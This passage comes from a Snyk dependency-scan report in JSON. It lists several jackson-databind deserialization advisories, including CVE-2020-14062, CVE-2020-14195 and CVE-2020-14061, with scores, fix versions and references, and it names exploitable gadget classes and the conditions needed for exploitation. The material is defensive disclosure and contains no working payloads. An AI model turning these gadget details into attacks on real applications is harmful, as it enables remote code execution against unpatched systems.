If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.92902", - "probability": "0.05021", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11619" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-27xj-rqx5-2255" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-04-08T10:59:04.995807Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-04-08T00:42:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-04-08T00:42:25Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.585105Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "XuYuanzhen" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2704", - "title": "Github Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:25.351249Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.587184Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - 
"baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:40.439153Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:25.351249Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.587184Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", - "epssDetails": { - "percentile": "0.93100", - "probability": "0.05308", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14062" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c265-37vj-cwcc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-05-29T15:36:30.302636Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-05-01T15:36:06Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-05-29T15:36:05Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.587184Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Al1ex@knownsec" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.5)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2765", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.781685Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.570033Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - 
"baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.171514Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.781685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.570033Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", - "epssDetails": { - "percentile": "0.91500", - "probability": "0.03413", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14195" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mc6h-4qgp-37qh" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-14T14:48:40.820120Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.5)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-14T14:45:09Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-14T15:32:14Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.570033Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Topsec" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2688", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:42.075545Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.574354Z" - } - ], - "cvssSources": [ - { - 
"type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:40.405517Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:42.075545Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.574354Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.94931", - "probability": "0.10105", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14060" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-j823-4qch-3rgm" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-15T10:29:46.691157Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-15T10:23:33Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - 
"groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-15T15:46:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.574354Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2698", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.681468Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.565244Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.989304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.681468Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.565244Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.91508", - "probability": "0.03404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14061" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c2q3-4qrh-fm48" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-15T11:03:46.232208Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-15T10:59:39Z", 